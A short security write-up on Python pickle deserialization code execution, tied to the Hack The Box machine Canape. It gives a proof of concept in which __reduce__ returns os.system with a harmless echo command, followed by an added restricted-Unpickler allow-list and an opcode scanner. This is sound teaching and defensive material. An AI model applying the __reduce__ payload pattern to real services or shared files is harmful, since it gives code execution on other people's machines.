Theory

When data is loaded with pickle.load or pickle.loads, and that data was serialized from an object that defines a __reduce__ method, RCE (Remote Code Execution) becomes possible: __reduce__ returns a callable together with its arguments, and the unpickler calls that callable while reconstructing the object. The official pickle documentation confirms the severity of this: it explicitly warns never to load (unpickle) data received from an untrusted source.


PoC

We can demonstrate it easily: dump an object that defines __reduce__ with pickle, then load the result. The Python code looks like this:

import pickle
import os

# __reduce__ tells pickle how to rebuild this object: call os.system with the
# given argument. The call happens at load time, not at dump time.
class Malicious:
    def __reduce__(self):
        return (os.system, ('echo "Code Executed" > proof.txt',))

# Serialize the object; nothing is executed yet.
with open('malicious.pkl', 'wb') as f:
    pickle.dump(Malicious(), f)

print("malicious data dumped")
print("your directory list :")
os.system('ls')
print()

input("Enter to Progress")
# Deserialize the object; the unpickler calls os.system here.
with open('malicious.pkl', 'rb') as f:
    data = pickle.load(f) # RCE occurs here!!

print("your directory list :")
os.system('ls')
print()

print("Read proof.txt")
os.system('cat proof.txt')
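The two defensive checks below are an added example, not part of the original writeup: a restricted Unpickler whose find_class only resolves an explicit allow-list of globals (the pattern the pickle documentation itself suggests), and a pre-load scan with pickletools that flags the opcodes able to import or call code. The payload class, the allow-list and the sample data are constructed for this example; the payload is only ever dumped, never loaded with the unrestricted loader.

```python
import io
import os
import pickle
import pickletools

# Constructed payload with the same shape as the PoC above: __reduce__ returns
# os.system plus its argument. It is serialized here for inspection only.
class _ReduceToSystem:
    def __reduce__(self):
        return (os.system, ('echo "would have run"',))

MALICIOUS_PICKLE = pickle.dumps(_ReduceToSystem())
# Constructed benign data: plain containers and scalars need no global lookup.
BENIGN_PICKLE = pickle.dumps({"user": "alice", "scores": [1, 2, 3]})


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not on an explicit allow-list.

    find_class is consulted for GLOBAL / STACK_GLOBAL opcodes, so os.system,
    subprocess.Popen, builtins.eval and the like raise before REDUCE can call them.
    """
    # Hypothetical allow-list; extend only with names you have reviewed.
    ALLOWED = {"builtins": {"set", "frozenset", "range", "slice"}}

    def find_class(self, module, name):
        if name in self.ALLOWED.get(module, ()):
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in replacement for pickle.loads that uses the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def loads_is_rejected(data: bytes) -> bool:
    """True if the restricted loader refuses the data, False if it loads."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


# Opcodes that can resolve a global or invoke a callable during unpickling.
# NEWOBJ/BUILD also appear for ordinary class instances, so a hit means
# "inspect", not necessarily "malicious"; pure-data pickles never contain them.
DANGEROUS_OPS = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}


def find_dangerous_opcodes(data: bytes):
    """Scan a pickle without executing it; return (opcode name, byte offset)."""
    hits = []
    for opcode, _arg, pos in pickletools.genops(data):
        if opcode.name in DANGEROUS_OPS:
            hits.append((opcode.name, pos))
    return hits


if __name__ == "__main__":
    print("benign scan   :", find_dangerous_opcodes(BENIGN_PICKLE))
    print("malicious scan:", find_dangerous_opcodes(MALICIOUS_PICKLE))
    print("benign load   :", restricted_loads(BENIGN_PICKLE))
    print("malicious load rejected:", loads_is_rejected(MALICIOUS_PICKLE))
```

The opcode scan is cheap and can run on data before it reaches any loader, while the restricted Unpickler is the actual enforcement point; neither replaces the documentation's advice to avoid pickle for untrusted input (use JSON or a schema-validated format there).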


CTF Machine

Hack The Box : Canape


Reference

https://docs.python.org/3/library/pickle.html